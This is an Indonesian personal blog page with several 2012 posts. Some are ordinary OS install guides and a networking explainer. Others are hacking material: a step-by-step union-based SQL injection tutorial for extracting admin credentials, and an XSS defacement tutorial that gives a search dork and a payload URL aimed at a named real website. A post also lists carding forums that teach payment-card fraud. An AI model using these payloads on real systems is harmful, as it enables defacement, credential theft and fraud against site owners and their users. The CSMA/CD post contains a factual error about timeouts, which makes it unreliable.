Ads 468x60px

Monday, June 25, 2012

Menginstall Backtrack 5 dengan media Flashdisk

setelah hafid bahas tentang install backtrack 5 dengan media DVD, hafid berifkir bagaimana jika orang ingin install backtrack di netbook mereka namun gak punya fasilitas DVD External......
wah,,...
pasti pusing tue.....
tenang,,, hafid punya Solusinya yaitu menginstall Backtrack 5 dengan media Flashdisk. Bagaimana caranya?
pengen tahu kan????????
langsung dah/......
Persiapan :
  • Install dahulu Linux Live Usb [aka] LiLi. Sobat dapat mengunduh di situs  resminya (freeware)
  •  ISO file dari Backtrack 5 (saya asumsikan sudah punya) atau kalau mau download silakan Klik Link INI
Cara Menginstall BACKTRACK 5 di Flashdisk
Jika Lili sudah terinstall, cara menggunakannya sangat mudah. Buka LiLi terlebih dahulu.
Disana ada 5 langkah yaitu sebagai berikut :
  1. 1Pilih Media Flashdisk yang akan di install dengan backtrack 5 (minimal 4 gb free)
  2. Pilih sumber Backtrack 5 yang akan di install, Bisa dengan File ISO, bisa DVD, atau download langsung. (pilih option  iso dan pilih file ISO yang sudah di persiapkan) 
  3. Pada Langkah ke 3 saya atur persistence jadi 900
  4. Hanya centang pada pilihan paling bawah yaitu “Enable launching LinuxLive in Windows” 
  5. Langkah terahir adalah mengklik tombol petir dan pembuatan Linux Live dimulai (tunggu kira-kira 30 menit )
    Linux Live USB siap di install di laptop anda.
S
uuntuk detail install Backtrack 5 klik disini Sebenarnya Linux Live Usb ini tidak hanya untuk menginstall Backtrack 5 saja, tapi bisa juga untuk menginstall Linux yang lain. dan juga bisa di pakai untuk varian-varian windows....
o oc dech...
semoga baermanfaat....

Reade more >>

Cara instal Backtrack 5 R2 Gnome

oc.....
setelah post tentang debian ubuntu, skarang hafid bakal bahas tentang varian linux yang lain nieh....
apakah itu???

buat yang blumt punya bisa download disini : http://repo.ugm.ac.id/iso/backtrack/
Click gambar agar terlihat jelas.
Berikut adalah cara install Backtrack 5 R2  :

- Insert media installasi (DVD/FlashDisk) ke PC anda, tunggu sampai tampilan seperti ini :



- Click enter,





- Pilih BackTract Text, click enter. Ketik Startx (Fungsi Startx adalah untuk memulai / memunculkan GUI Backtrack 5 R2 Gnome)



- Click Install BackTrack,


- Pilih English, setelah itu click Forward, tunggu sampai setting up the clock selesai,


- Sesuaikan Religion dan Time Zone sesuai keinginan anda lalu click Forward :


- Pilih Keyboard layout yang anda inginkan. Lalu click Forward,


- Pilih Specify partitions manually (advanced), lalu click forward,


- Click free space, lalu click Add..


- Buat partisi dengan settingan sesuai yang ada digambar atas, kecuali size (isi sesuai kebutuhan anda) lalu click OK,


- Pilih free space, lalu click Add..


- Buat partisi dengan settingan sesuai yang ada digambar atas, kecuali size (isi sesuai kebutuhan anda) lalu click OK,


- Pilih partisi yang bertype Ext4, lalu click Forward,


- Click Install, tunggu sampai proses installasi selesai.



- Click Restart Now,

- Remove atau lepas media installasi (DVD/FlashDisk) dari PC/laptop anda, dan click enter. Maka PC/Laptop anda akan restart dan tunggu sampai tampilan seperti ini :


Isi Login dengan : root
dan isi Passwordnya dengan : toor
lalu ketik startx agar masuk ke dekstopnya, remove/delete shortcut "install BackTrack" yang ada pada dekstop. Proses instalasi Backtrack 5 R2 selesai.
semoga bermanfaat para blogger sejati.....
Reade more >>

Wednesday, June 20, 2012

Instal Windows Via Network (LAN)


kai ini hafid bakal posting tentang install windows via jaringan (LAN). Untuk melakukan installasi lewat jaringan yang di perlukan selain perangkat jaringan dan perangkat installasi adalah sebuah software yang bernama TFTPBoot.exe, dan bisa di download DISINI

Berikut Step-stepnya:
  1. Siapkan komputer dengan SO windows sebagai tempat source installasi dan untuk menjalankan software TFTPBoot.exe
  2. Jalankan TFTPBoot.exe dan ekstrak isinya ke drive C:

  3. Buka folder tftpboot trus dobel klik file tftpd32.exe
  4. Setelah muncul menunya, klik tombol “Settings” disebelah bawah. settingnya seperti ini:

  5. Klik OK untuk kembali ke menu Tftpd32. Klik tab “DHCP Server
  6. Setting seperti gambar berikut dan Save (IP address silahkan disesuaikan dengan IP jaringan anda)

  7. Tutup aplikasi Tftpd32.
  8. Matikan semua firewall anda (termasuk yg built-in di Windows) pada PC/laptop yg ada Tftpd32-nya. Atur adapter network dlm PC supaya IP address-nya sesuai dengan settingan di aplikasi Tftpd32 (pada gambar diatas IP addressnya 192.168.1.5)
  9. Sambungkan PC yg terinstal Tftpd32 didalamnya (PC A) dgn PC yg mau diinstal (PC B) dengan kabel Ethernet (Pastikan tidak ada konflik DHCP server di kedua PC)
  10. Jalankan file “Tftd32.exe
  11. Setting BIOS PC yg mau diinstal (PC B), agar boot dari network (PXE). Caranya bervariasi tergantung jenis mobo anda, dan booting lewat jaringan
  12. Untuk instal Windows di PC (B), masukkan CD instalasi Windows di PC (A), lalu sharing drive CD-ROM tersebut dengan nama CD (atau bisa nama yang lain)
  13. Beralih ke PC target, dari jendela command, ketik:

    ipconfig (untuk mengetahui IP addres di komputer target (PC B) apa sudah sesuai dengan kelas IP yang di komputer source (PC A) Jika sudah bisa lanjut ke step berikutnya, jika beda kelas rubah IPnya dengan kode "netsh interface ip set address name=”Local Area Connection” static 192.168.1.10 255.255.255.0 192.168.0.5"

    Selanjutnya pada jendela command, ketik:
    net use y: \\192.168.1.5\cd
  14. Akan muncul pesan/prompt untuk mengisi username. Ketik: 192.168.1.5\user name pada PC A
    Kemudian enter dan masukkan password PC A
  15. Kalau sudah muncul prompt “the command completed successfully”, ketik y: lalu tekan ENTER.
  16. Ketik setup lalu ENTER dan anda sdh siap instal Windows ke PC target
  17. Jika Tombol Instal-nya tidak aktif bisa menggunakan sintak "\i386\winnt32.exe /syspart:c:" pada jendela command, setelah installasi selesai dan kembali ke jendela command, restar dengan ketik "wpeutil reboot"
  18. Setelah komputer restart, boot komputer dari hardisk (bukan dari network lagi!!) dan lanjutkan installasi
  19. Kalau instalasi sudah selesai, kembalikan semua perubahan yg td dilakukan di PC target, stop proses sharing CD/DVD-ROM-nya, aktifkan kembali firewall dan atur ulang IP address network adapternya. sekian tutorial klie ini....
    semoga bermanfaat...       
sumber : http://forum.chip.co.id
Reade more >>

Sunday, June 17, 2012

Jaringan Ethernet (CSMA/CD)


Ethernet adalah sebuah metode akses media jaringan di mana semua host di jaringan tersebut berbagi bandwidth yang sama dari sebuah link. Ethernet menjadi populer karena ia mudah sekali disesuaikan dengan kebutuhan (scalable), artinya cukup mudah untuk mengintegrasikan teknologi baru seperti Fast Ethernet dan Gigabit Ethernet, ke dalam infrastruktur network yang ada. Ethernet juga relatif mudah untuk diimplementasikan dari awal, dan cara pemecahan masalahnya juga mudah. Ethernet menggunakan spesifikasi layer physical dan Data Link. Bagian berikut akan membahas mengenai informasi apa saja di kedua layer tersebut yang perlu diketahui untuk secara efektif mengimplementasi, memecahkan masalah, dan mempertahankan sebuah jaringan ethernet.

Jaringan Ethernet menggunakan apa yang dinamakan Carrier Sense Multiple Access with collisoin Detection (CSMA/CD), yaitu sebuah protokol yang membantu peralatan jaringan untuk berbagi bandwidth secara merata tanpa mengalami kejadian di mana dua peralatan mengirimkan data pada saat yang bersamaaan. CSMA/CD diciptakan untuk mengatasi masalah collision yang terjadi ketika paket-paket dikirmkan secara serentak dari titik jaringan (node) yang berbeda. Percayalah bahwa pengelolaan collision yang baik adalah sangat penting karena ketika sebuah titik jaringan mengirimkan data di jaringan CSMA/CD, semua titik lain akan menerima dan memeriksa data tersebut. Hanya bridge dan router yang dapat secara efektif mencegah sebuah data mengalir ke seluruh jaringan.

Jadi, bagaiman CSMA/CD bekerja? Jawabannya adalah seperti berikut :
Ketika sebuah host ingin mengirimkan data ke sebuah jaringan, dia akan melakukan pengecekan terlebih dahulu terhadap ada atau tidaknya sinyal digital di kabel. Jika tidak ditemukan sinyal (tidak ada host yang sedang mengirm data), host tersebut akan meneruskan pengiriman data. Namun ini tidak berhenti di sini saja. Host yang mengirimkan data tersebut akan secara konstan memantau kabel untuk memastikan bahwa tidak host yang mulai mengirimkan data. Jika host tersebut menemukan adanya sinya lain di kabel tersebut, ia akan mengirmkan sebuah sinyal pengacak tambahan yang akan mengakibatkan semua titik di jaringan tersebut untuk menghentikan percobaan pengiriman data (mirip sinyal sibuk). Titik-titik di jaringan tersebut akan bereaksi terhadap sinyal pengacak tersebut dengan menunggu beberapa saat sebelum mencoba melakukan pengiriman data lagi. Sebuah algoritma backofff(waktu tunda pengiriman ulang yang diberlakukan setelah collision terjadi) akan menentukan kapan host-host yang mengalami collision tadi untuk mulai melakukan pengiriman data. Jika collison tetap terjadi setelah 15 menit, titik yang mencoba mengirm data tadi akan mengalami time-out. Jelas bukan????

Efek dari adanya network CSMA/CD untuk mengatasi collision berat yatu : Delay, Throughput (laju kecepatan perpindahan data) yang rendah, dan congestion.
Reade more >>

Forum-Forum Underground yang Ada di Indonesia

Kalian suka main diforum "underground" ngga? Itu lho... forum yang isinya membahas tentang dunia security, hacking, carding, defacing, sing... sing... apalah wkwk XD yang pasti semua threadnya berkaitan dengan dunia IT. Nah dipostingan kali ini saya akan membahas beberapa forum underground yang ada di Indonesia. Maaf Kalo agak berantakan postingnya :D

http://cirebon-cyber4rt.blogspot.com/2012/05/forum-forum-underground-yang-ada-di.html

Berikut Forum-Forum Underground yang Ada di Indonesia :

1. Hacker Newbie - Community
Siapa yang tak kenal HN-Community, forum underground yang identik dengan icon "tengkorak dengan mata merah berkedip" ini merupakan salah satu forum underground favorite saya. Tampilan forumnya itu yang bikin saya suka, dan juga para adminnya yang ramah-ramah :D

Link Menuju Forum : http://hacker-newbie.org/

2. Devilzc0de
Berawal dari sekumpulan anak-anak Tangerang yang bergabung di salah satu Forum Hacker Terbesar Indonesia. Mereka saling berbagi ilmu yang mereka miliki sesama member lainnya. Sedikit demi sedikit mereka kenal dan saling mengenal dengan member yang lainnya. Terutama sesama member yang terkhusus untuk daerah Tangerang, mereka lebih mempererat tali silaturahminya. Mungkin mereka pikir dengan mengenal member yang satu daerah, selain akrab di dunia Maya juga bisa akrab di dunia Nyata untuk bisa saling berbagi ilmu Hacking secara langsung.

Link Menuju Forum : http://devilzc0de.org/forum/

3. YogyaCarderLink
Merupakan salah satu Forum Carder ternama di Indonesia. Sudah keliatan dari namanya Yogya"Carder Link" : "Tukang Main Kartu" eitts... bukan kartu poker lho, tapi kartu ATM, VISA, Paypal dll. Disana adalah tempatnya para carder belajar membobol kartu ATM, VISA, Paypall dsb. Tapi ngga hanya belajar membobol kartu lho, Yogyacarderlink juga sering melakukan aksi defacing dibeberapa situs luar dan dalam negeri.

Link Menuju Forum : https://yogyacarderlink.web.id/

4. Palembang Hacker Link
Merupakan forum underground indonesia yang bermarkas di Palembang. Forum ini sempat vakum akibat Serangan deface oleh decafer asal Medan Alex_own5. Namun sekarang PHL sudah pulih kembali dan aktif hingga saat ini.

Link Menuju Forum : http://palembanghackerlink.com/

5. XCode - Yogya Family Code
Adalah forum underground yang bermarkas di Kota Yogyakarta. Semua tutorial hacking ada semua disini. Forum ini masih satu kerabat dengan YogyaCarderLink.

Link Menuju Forum : http://www.xcode.or.id/forum/

Daftar diatas saya ambil dari berbagai sumber, jadi kalo sobat ragu dengan penjelasan diatas saya bisa memaklumi. Sekian postingan saya kali ini tentang daftar Forum-Forum Underground yang Ada di Indonesia. semoga postingan saya ini bisa bermanfaat bagi sobat semua.
Reade more >>

Cara Deface Website Menggunakan Teknik XSS Vulnerability


http://cirebon-cyber4rt.blogspot.com/
kali ini hafid akan membahas tentang Cyber Gravity... yaitu Cara Deface Website Menggunakan Teknik XSS Vulnerability.

Sebelumnya udah pada tau belum apa itu XSS Vulnerability? XSS Vulnerability adalah suatu cara memasukan code/script HTML kedalam suatu website dan dijalankan melalui browser di client. Ok deh, Langsung aja kita bahas bersama Cara Deface Website Menggunakan Teknik XSS Vulnerability ini !

1). Pertama, Masukan Dorknya :

inurl:"/showcatrows.php?CategoryID="

http://cirebon-cyber4rt.blogspot.com/2012/06/cara-deface-website-menggunakan-teknik.html

2). Kalo sudah, Pilih salah satu web yang akan kita deface.

Contoh : saya pakai web ini http://www.examsolutions.co.uk/...?CategoryID=13

http://cirebon-cyber4rt.blogspot.com/2012/06/cara-deface-website-menggunakan-teknik.html

3). Jika sudah masuk ke halaman web target, kita modifikasi sedikit URL web target dengan menambahkan tanda " dan > setelah angka, tepatnya pada akhir URL. Lalu tambahkan kode HTML deface kita.

Contoh : http://www.examsolutions.co.uk/...?CategoryID=13"><marquee><h1>Hacked by Cirebon-Cyber4rt</h1></marquee>

4). Kemudian tekan Enter.

http://cirebon-cyber4rt.blogspot.com/2012/06/cara-deface-website-menggunakan-teknik.html

5). Selesai, Website sudah berhasil kita deface :D

Triknya memang cukup simpel, dimana kita memanfaatkan celah keamanan pada XSS sebuah website dengan memasukan sebuah code/script HTML..
semoga bermanfaat...
jadilah hacker yang baik..
Reade more >>

Mengatasi/Mencegah SQL Injection pada PHP

Mengatasi/Mencegah SQL Injection pada PHP
kayaknya kurang bertnggung jawab jika uda posting tentang Cara Hacking Website Dengan Teknik SQL Injection
tapi gak bahas cara untuk menanggulangi / mencegah hacking dengan SQL Injection.........
"SQL Injection" yaitu trik hacking dengan cara mengedit isi dari variabel get yang ada di url untuk melakukan penetrasi kedalam database.. teknik SQL Injection juga bsa di lakukan pada form login dengan membaypass atau melewati autentikasi login dengan syntak SQL..
 
 okeh ini dia trik nya..
 
1. Dengan cara menjadikan variabel get menjadi absolute integer
    Penjelasan:
    Biasanya para hacker melakukan penetrasi terhadap variabel id yang kita letakkan pada url..
  
    Contoh:
    pada url http://webkamu/berita.php?id=1
    ketika akan membaca isi dari variabel id biasanya kita menggunakan syntak
   
    $id = $_GET['id'];
    jadi setiap isi dari id pada url akan disimpan pada variable $id..
   
    dan untuk query ke database :
    "SELECT * FROM tbl_berita WHERE id='$id'"
 
     nah melalui variabel $id ini lah para hacker menggunakan teknik SQL Injection, dengan   memasukkan perintah2 SQL yang dapat mengeksploitasi database..
 
    Solusinya:
    kita buat id menjadi absolute integer dengan mengubah sintaks pembacaan variabel get id menjadi:
    $id = abs((int)$_GET['id']);
 
    fungsi abs() digunakan untuk menghilangkan tipe data minus dan int digunakan untuk mengubah tipe data menjadi integer (hanya mengijinkan tipe data integer). jadi ketika variabel id pada url di rubah secara manual dan diisi dengan sintak SQL yang berupa string maka tetap dibaca 0.  
 
 
2. Dengan menambahkan variabel get berisi enkripsi md5 yg divariasi pada url
     jika awal url adalah
     http://webkamu/berita.php?id=1
 
   maka kita akan menambahkan variabel yg berisi enkripsi dari id yg kita modifikasi dengan string acak menjadi
     http://webkamu/berita.php?id=1&token=9b0443e36affedbafe882a4bbb90eaec
 
nah sekilas terlihat mirip sma url2 facebook.. wahh kereeen :)

ok, saya jelaskan maksud dari variabel token diatas, jadi ketika awal kita memberikan link untuk next berita or previous berita atau berita lainnya.. pokok nya yang menampilkan berita lain dah.. kita isi
$token = md5(md5($id_berita).md5('kata acak'));
jadi href nya menjadi : berita.php?id=$id_berita&token=$token
 
sekarang pada halaman tampil berita kita tambahkan pengecekan apakah id berita diganti/diinject manual oleh user dengan cara :
 
$id_berita=$_GET['id_berita'];
$token=$_GET['token'];
$cek=md5(md5($id_berita).md5('kata acak'));
if($token==$cek){
   //syntak menampilkan berita disini
}
else{
   echo "SQL Injection detected..!!!!";
}
 
nah slsai deh,, hehehe
bingung..??? semoga ngga deh yha.. klo bingung boleh dah rokoknya di isep dlu.. hehe (tpi jangan deket2 ma ane yha gan, ane ga ngerokok) pisssss..!!!
 
 
3. Khusus untuk form login, dengan melakukan enkripsi password atau merubah algoritma autentikasi login.
    biasanya kita melakukan pengecekan ketika user login yaitu dengan melakukan query kedatabase:
 
$input_username=$_POST[username];
$input_password=$_POST[password];
 
$q="SELECT * FROM tbl_user where username='$input_username' and password='$input_passsword'";
$r=mysql_query($q);
$jml_row=mysql_num_rows($r);
if($jml_row > 0){
     echo "login sukses";
}
else{
     echo "login gagal";
}
 
nah algoritma autentikasi login seperti diatas sangat rentan terhadap penetrasi SQL Injection..
solusi pertama dengan melakukan enkripsi pada password yaitu dengan mengganti
skrip berikut :
 
$input_password=$_POST[password]; menjadi:
$input_password=md5(md5($_POST[password]).md5('karakter acak'));
 
tentunya yang berakibat dengn mengenkripsi semua password di database sesuai enkripsi diatas.. :)
 
(semoga ga pada pusing yah :D)
 
solusi kedua yaitu dengan merubah algoritma menjadi
 
$d=mysql_fetch_array($r);
if($jml_row >0 && ($d[password]==$input_password))            << di tambah pengecekan inputan password thd password di dtabase
 
itulah trikx untuk menanggulangi hacking dengan SQL Injection......
 smoga bermanfaat :)
Reade more >>

Cara Hacking Website Dengan Teknik SQL Injection

kali ini hafid akan sedikit membahas tentang tehnik hacking dengan SQL Injection........
Pengertian SQL Injection, SQL Injection adalah sebuah aksi hacking yang dilakukan diaplikasi client dengan cara memodifikasi perintah SQL yang ada dimemori aplikasi client dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.


Yang perlu diketahui sebelum melakukan SQL Injection pada MySQL:
karakter: ' atau -
comments: /* atau --
information_schema untuk versi: MySQL versi 5.x , tidak support untuk MySQL versi 4.x

[ Step 1 ]

    Carilah target
    Misal: [site]/berita.php?id=100

    Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada pesan error.
    contoh:
    [site]/berita.php?id=100' atau
    [site]/berita.php?id=-100
    Sehingga muncul pesan error seperti berikut [ masih banyak lagi ]

[ Step 2 ]

    Mencari dan menghitung jumlah table yang ada dalam databasenya...
    gunakan perintah: order by

    Contoh:

    [site]/berita.php?id=-100+order+by+1-- atau
    [site]/berita.php?id=-100+order+by+1/*

    Ceklah secara step by step (satupersatu)...
    Misal:

    [site]/berita.php?id=-100+order+by+1--
    [site]/berita.php?id=-100+order+by+2--
    [site]/berita.php?id=-100+order+by+3--
    [site]/berita.php?id=-100+order+by+4--

    Sehingga muncul error atau hilang pesan error...
    Misal: [site]/berita.php?id=-100+order+by+9--

    Berarti yang kita ambil adalah sampai angka 8
    Menjadi [site]/berita.php?id=-100+order+by+8--

[ Step 3 ]

    untuk mengeluarkan angka berapa yang muncul gunakan perintah union
    karena tadi error sampai angka 9
    maka: [site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8--

    ok seumpama yg keluar angka 5

    gunakan perintah version() atau @@version untuk mengecek versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi
    misal: [site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8-- atau
    [site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8--

    Lihat versi yang digunakan se'umpama versi 4 tinggalkan saja karena dalam versi 4 ini kita harus menebak sendiri table dan column yang ada pada web tersebut karena tidak bisa menggunakan perintah From+Information_schema..

    Untuk versi 5 berarti anda beruntung tak perlu menebak table dan column seperti versi 4 karena di versi 5 ini bisa menggunakan perintah From+Information_schema..

[ Step 4 ]

    Untuk menampilkan table yang ada pada web tersebut adalah
    perintah table_name >>> dimasukan pada angka yangg keluar tadi
    perintah +from+information_schema.tables/* >>> dimasukan setelah angka terakhir

    Code:

    [site]/berita.php?id=-100+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.tables--

    Se'umpama table yang muncul adalah "admin"

[ Step 5 ]

    untuk menampilkan semua isi dari table tersebut adalah
    perintah group_concat(table_name) >>> dimasukan pada angka yang keluar tadi
    perintah +from+information_schema.tables+where+table_schema=database() >>> dimasukan setelah angka terakhir

    [site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name),6,7,8+from+information_schema.​tables+where+table_schema=database()--

[ Step 6 ]

    Perintah group_concat(column_name) >>> dimasukan pada angka yang keluar tadi
    perintah +from+information_schema.columns+where+table_name=0xhexa-- >>> dimasukan setelah angka terakhir

    [site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema​.columns+where+table_name=0xhexa--

    Pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya
    Website yg digunakan untuk konversi :

    http://www.v3n0m.net/ascii.htm

    Contoh kata yang ingin dikonversi yaitu admin maka akan menjadi 61646D696E

    [site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema​.columns+where+table_name=0x61646D696E--

[ Step 7 ]

    Memunculkan apa yang tadi telah dikeluarkan dari table yaitu dengan cara

    perintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg keluar tadi
    perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhir

    Contoh :

    [site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8+from+(nama table berasal)--

    Contoh kata yang keluar adalah id,username,password

    Contoh :

    [site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,id,username,password),6,7,8+from+admin--

[ Step 8 ]

    Tahap terakhir mencari halaman admin atau login.

Sekian postingan saya kali ini tentang Cara Hacking Website Dengan Teknik SQL Injection, tutorial hacking yang lain akan menyusul, Jadi mampir terus kesini ya :D
Reade more >>

Saturday, June 16, 2012

Cara Instal Linux Mint dual booting dengan Windows 7

kayaknya masih ada yang kurang jika udah bhas Cara Install Dual Boot Windows 7 dan Ubuntu 12.04 namun hafid blomt bahas versi yang lebih randah " linux mint 9".....
jadi, hafid akan bhas pada artikel kali ini
Linux Mint 9 dikenal juga dengan nama "Isadora". Para pembuat Linux Mint memberi code name  atau alias pada setiap versi Linux Mint mengikuti urutan huruf alfabet. Uniknya, setiap versi diberi nama wanita: Helena, Isadora, Julia, Katya dst. 

Linux Mint 9 adalah versi LTS (Long Term Support), artinya versi ini akan didukung, dikawal dan diperhatikan sampai April 2013.



Sebelum menginstal, pastikan bahwa:


  • Anda lebih baik memiliki back up atau salinan data-data di komputer/laptop Anda [saya sendiri tidak pernah mem back up karena belum pernah mengalami "kecelakaan" yang mengakibatkan kehilangan semua isi hard disk]. 
  • Anda sudah menyiapkan partisi khusus untuk Linux Mint seperti yang diterangkan di artikel ini.
  • Komputer Anda tersambung ke internet.
  • Anda sudah memiliki fail ISO Linux Mint baik yang sudah dibakar (burn) di DVD/CD atau Flashdisk.
  • Anda bisa mengikuti setiap langkah tutorial berikut dengan cermat (salah klik bisa berakibat fatal)




Instalasi

1. Masukkan CD/DVD ke DVD-Rom - masukkan Flashdisk.

2. Pilih CD/DVD-Rom atau Flashdisk sebagai first boot, atau primary atau mediabooting utama atau apalah namanya. Untuk komputer, masuk ke BIOS (tekan "Delete", "Space", "Backspace" atau apalah--tergantung merek komputer). Untuk laptop, biasanya F12 atau F2.

3. Biarkan komputer booting, mungkin akan memakan waktu 3-10 menit, tergantung kualitas komputer. Bila sudah berhasil booting tampilan layar akan berbentuk seperti ini:



Linux Mint 9 full screen
gambar 1
5. Bila ada pop up window "Restricted drivers available" abaikan saja dulu. Percuma menginstalnya sekarang.



Restricted drivers available
gambar 2



6. Salah satu kelebihan Linux dibanding Windows adalah Linux bisa dijalankan cukup dari CD/DVD instalasi. Fitur ini dikenal dengan live CD, jadi Anda bisa melakukan test drive sebelum benar-benar menginstal Linux Mint. Karena itu juga, Anda bisa menginstal sambil mengoperasikan Linux dalam waktu yang bersamaan. Jadi, Anda tetap bisa membaca tutorial ini dan berselancar di internet saat menginstal nanti.



Live CD aka test drive Linux Mint 9
gambar 3





7. Buka (open; double klick) ikon Install Linux Mint yang ada di desktop, akan muncul jendela baru yakni jendela instalasi. Langkah pertama, Anda memilih bahasa utama Linux Mint Anda. Saya lebih memilih bahasa Inggris. Pilihan bahasa Indonesia juga tersedia. Klik  "Forward".



Select language
gambar 4
8. Selanjutnya Linux Mint akan mencoba mendeteksi lokasi dan menyesuaikan jam di komputer Anda. Biarkan. 



Setting up the clock
gambar 5
9. Pilih lokasi di mana Anda berada. Pertama tentukan region/benua, lalu pilih negara. Klik "Forward".



Select location
gambar 6
10. Selanjutnya, kita memilih keyboard layout.





Select keyboard
gambar 7
Anda juga bisa mencoba keyboard di kotak kosong [ditunjuk tanda panah] untuk memastikan lay out keyboard. Klik "Forward" untuk lanjut.


11. Selanjutnya, kita akan memilih metode instalasi Linux Mint:



gambar 8


Klik opsi "Specify partitions manually (advanced)", setelah diklik, tampilan akan menjadi seperti ini:





gambar 9


Klik "Forward" untuk lanjut.




12. Di jendela berikut, klik free space yang sudah kita sediakan sebelumnya. Lalu klik "Add".

gambar 10






Free space yang ada akan dibagi menjadi tiga: swap area, file system dan home. Swap berfungsi seperti RAM di komputer. Pada komputer jadul, ukuran swap biasanya dua kali lipat ukuran RAM komputer kita. Saat ini, ukuran swap boleh setara dengan ukuran RAM, bahkan bila RAM di komputer Anda besar,space untuk swap bisa lebih diperkecil. Di laptop saya yang memiliki RAM 4 GB, swap 512 MB boleh, 1 GB boleh, 1,5 GB cukup, 2 GB oke. Terserah. Swap nantinya jarang dipakai, kecuali kalau Anda sering meng-hibernate komputer. 

create swap partition
gambar 11



Sesuaikan dengan gambar: pilih primary, 2000 (MB) atau terserah, swap area, lalu klik ok.



13. Setelah itu kita akan dibawa kembali ke tampilan partisi [gambar 10]. Tadi kita sudah mengambil 2 GB untuk swap, berarti masih ada sisa sekitar 18 GB. Bila berjalan normal, maka sisa yang 18 GB akan berstatus "free space" dan masih bisa dibentuk. Maka, lanjut klik "free space" dan "Add".

Namun bila ternyata sisa partisi berstatus "unusable", berarti Anda memiliki lebih dari 4 partisi utama (primary partition) di komputer Anda, dan itu "tidak bisssssa!"  
Cara paling gampang mengatasinya adalah: klik partisi "swap area" yang baru selesai dibuat, kemudian "Delete"! Ulangi lagi membuat partisi "swap area" seperti langkah di atas, tetapi ganti pilihan dari "primary" menjadi "logical". Saya beberapa waktu sempat memakai partisi "logical" dan tidak mendapat masalah.

Sependek pengetahuan saya, swap dan file system di Linux memang baiknya menggunakan label "primary". Tetapi, entahlah... saya pakai "logical", tak ada masalah. :)

14. Buat tempat file system (/), tempat Linux bekerja. Partisi untuk (/) harus banyak. Misal, bila saya memiliki 10 GB, maka saya akan bagi: 1,5 untuk swap, 6 GB untuk (/) dan 2,5 GB untuk home. Atau, seperti di tutorial ini, saya punya 20 GB 974 MB, maka saya bagi: 2 GB untuk swap, 12 GB "/" dan 6,974 GB untuk "home". Silakan diatur sendiri sesuai selera dan kebutuhan. 

create / partition
gambar 12
Pada kotak "Use as", kita memilih ext3, bila tanda panah opsi diklik, akan muncul format-format lain. Linux Mint 9 memilih ext3 sebagai default kalau tidak salah. Sementara Linux Mint 10 dan 11 sudah menggunakan ext4. Ext4 adalah versi upgrade dari ext3, seperti Windows 7 adalah upgrade dari Windows Vista. Anggap saja begitu. :)

Di kotak "Mount point" pilih tanda "/" (klik tanda panah opsi roll ).


15. Buat partisi "home".

create home partition
gambar 13
Klik "Forward" untuk lanjut.



16. Isi nama, login name, password, dan opsi login:

gambar 14
"Log in automatically" : Anda masuk/log in tanpa harus mengetik password. Opsi ini cara masuk paling cepat.

"Require my password to log in" : Anda harus mengetik password setiap kali login.

"Require my password to log in and to decrypt my home folder" : ini opsi paling repot, namun paling aman. Karena semuanya di-password. :) Klik "Forward" untuk lanjut".


17. Konfirmasi untuk menginstal. Klik "Install" untuk mulai.

gambar 15


18. Proses instalasi mulai. Ini akan memakan waktu 10 - 20 menit, tergantung kualitas komputer dan kecepatan koneksi internet Anda. Tunggu sampai selesai.

Installing Linux Mint 9
gambar 16

19. Bila instalasi sudah selesai, akan muncul jendela seperti ini:

Installation complete
gambar 17

Klik "Restart Now" untuk menyelesaikan proses instalasi Linux dan mulai ngelinux.  :)

20. Tada! Linux Mint 9 siap dipakai!

welcome to Linux Mint 9 - gambar 18
21. Start menu:

Start menu - gambar 19
Klik di kotak "Filter" untuk mencari program yang ingin dijalankan. Start menu yang sering disebut "Mint menu" ini merupakan salah satu daya tarik Linux Mint.


22. Start menu "All aplication" dan "Favorites"

Start menu All applications - gambar 20
Semua program sudah dikelompokkan berdasarkan kategori masing-masing. Semua codec multimedia sudah terinstal, office, browser, messenger client dsb sudah terinsal. 

Klik "Quit" (tombol merah di atas "Mint menu") untuk opsi restart, shutdown atau hibernate
Reade more >>

Followers

visitor of state

like me on FaceBook